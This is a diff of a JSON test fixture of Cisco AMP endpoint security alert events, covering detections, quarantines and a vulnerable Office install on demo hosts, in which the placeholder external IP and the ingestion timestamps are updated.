"test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2072,7 +2072,7 @@ "Demo_AMP_MAP_FriedEx" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2082,8 +2082,8 @@ }, "event": { "severity": 0, - "ingested": "2021-09-30T00:13:59.322471084Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583671182384431000,\"timestamp\":1610582528,\"timestamp_nanoseconds\":614000000,\"date\":\"2021-01-14T00:02:08+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", + "ingested": "2021-12-09T13:35:29.222533800Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583671182384431000,\"timestamp\":1610582528,\"timestamp_nanoseconds\":614000000,\"date\":\"2021-01-14T00:02:08+00:00\",\"event_type\":\"Policy 
Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "code": "553648130", "kind": "alert", "action": "Policy Update", @@ -2100,7 +2100,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "connector_guid": "test_connector_guid", "related": { @@ -2136,7 +2136,7 @@ "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2146,8 +2146,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:13:59.322477067Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":695000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411132837046517762\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}", + "ingested": "2021-12-09T13:35:29.222539400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":695000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Quarantine Attempt 
Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411132837046517762\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}", "code": "2164260893", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -2167,7 +2167,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2212,7 +2212,7 @@ "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2222,8 +2222,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:13:59.322479467Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":691000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411132837046517761\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}", + "ingested": "2021-12-09T13:35:29.222545Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":691000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective 
Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411132837046517761\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}", "code": "553648155", "kind": "alert", "action": "Retrospective Quarantine", @@ -2243,7 +2243,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2286,7 +2286,7 @@ "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2300,8 +2300,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:13:59.322481709Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":684000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.0B965CA8AF-95.SBX.TG\",\"detection_id\":\"6411132837046517762\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"11179468.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\11179468.exe\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}", + "ingested": "2021-12-09T13:35:29.222550700Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":684000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.0B965CA8AF-95.SBX.TG\",\"detection_id\":\"6411132837046517762\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"11179468.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\11179468.exe\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -2323,7 +2323,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2370,7 +2370,7 @@ "5faebef3bb880489195e80e6656ccf442ff7123b" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2384,8 +2384,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:13:59.322483920Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":682000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.0B965CA8AF-95.SBX.TG\",\"detection_id\":\"6411132837046517761\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\",\"sha1\":\"5faebef3bb880489195e80e6656ccf442ff7123b\",\"md5\":\"84b6f7be5370c1998886214790c6892b\"}}}}", + "ingested": "2021-12-09T13:35:29.222556400Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":682000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.0B965CA8AF-95.SBX.TG\",\"detection_id\":\"6411132837046517761\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\",\"sha1\":\"5faebef3bb880489195e80e6656ccf442ff7123b\",\"md5\":\"84b6f7be5370c1998886214790c6892b\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -2407,7 +2407,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2454,7 +2454,7 @@ "3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2464,8 +2464,8 @@ }, "event": { "severity": 1, - "ingested": "2021-09-30T00:13:59.322486161Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15152998206589,\"timestamp\":1610534253,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-13T10:37:33+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1610534253,\"start_date\":\"2021-01-13T10:37:33+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"WINWORD.EXE\",\"identity\":{\"sha256\":\"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft 
Office\",\"version\":\"2013\",\"cve\":\"CVE-2014-0260\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0260\"},{\"cve\":\"CVE-2014-1761\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1761\"},{\"cve\":\"CVE-2014-6357\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6357\"},{\"cve\":\"CVE-2015-0085\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0085\"},{\"cve\":\"CVE-2015-0086\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0086\"},{\"cve\":\"CVE-2015-1641\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1641\"},{\"cve\":\"CVE-2015-1650\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1650\"},{\"cve\":\"CVE-2015-1682\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1682\"},{\"cve\":\"CVE-2015-2379\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2379\"},{\"cve\":\"CVE-2015-2380\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2380\"},{\"cve\":\"CVE-2015-2424\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2424\"},{\"cve\":\"CVE-2016-0127\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0127\"},{\"cve\":\"CVE-2016-7193\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7193\"},{\"cve\":\"CVE-2017-0292\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0292\"},{\"cve\":\"CVE-2017-11826\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11826\"}]}}", + "ingested": "2021-12-09T13:35:29.222562Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15152998206589,\"timestamp\":1610534253,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-13T10:37:33+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1610534253,\"start_date\":\"2021-01-13T10:37:33+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"WINWORD.EXE\",\"identity\":{\"sha256\":\"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft 
Office\",\"version\":\"2013\",\"cve\":\"CVE-2014-0260\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0260\"},{\"cve\":\"CVE-2014-1761\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1761\"},{\"cve\":\"CVE-2014-6357\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6357\"},{\"cve\":\"CVE-2015-0085\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0085\"},{\"cve\":\"CVE-2015-0086\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0086\"},{\"cve\":\"CVE-2015-1641\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1641\"},{\"cve\":\"CVE-2015-1650\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1650\"},{\"cve\":\"CVE-2015-1682\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1682\"},{\"cve\":\"CVE-2015-2379\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2379\"},{\"cve\":\"CVE-2015-2380\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2380\"},{\"cve\":\"CVE-2015-2424\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2424\"},{\"cve\":\"CVE-2016-0127\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0127\"},{\"cve\":\"CVE-2016-7193\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7193\"},{\"cve\":\"CVE-2017-0292\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0292\"},{\"cve\":\"CVE-2017-11826\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11826\"}]}}", "code": "1107296279", "kind": "alert", "start": "2021-01-13T10:37:33.000Z", 
@@ -2486,7 +2486,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -2618,7 +2618,7 @@ "Demo_AMP" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2628,8 +2628,8 @@ }, "event": { "severity": 0, - "ingested": "2021-09-30T00:13:59.322488385Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508159571352093000,\"timestamp\":1610533415,\"timestamp_nanoseconds\":349000000,\"date\":\"2021-01-13T10:23:35+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", + "ingested": "2021-12-09T13:35:29.222567700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508159571352093000,\"timestamp\":1610533415,\"timestamp_nanoseconds\":349000000,\"date\":\"2021-01-13T10:23:35+00:00\",\"event_type\":\"Policy 
Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "code": "553648130", "kind": "alert", "action": "Policy Update", @@ -2646,7 +2646,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "connector_guid": "test_connector_guid", "related": { @@ -2689,7 +2689,7 @@ "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
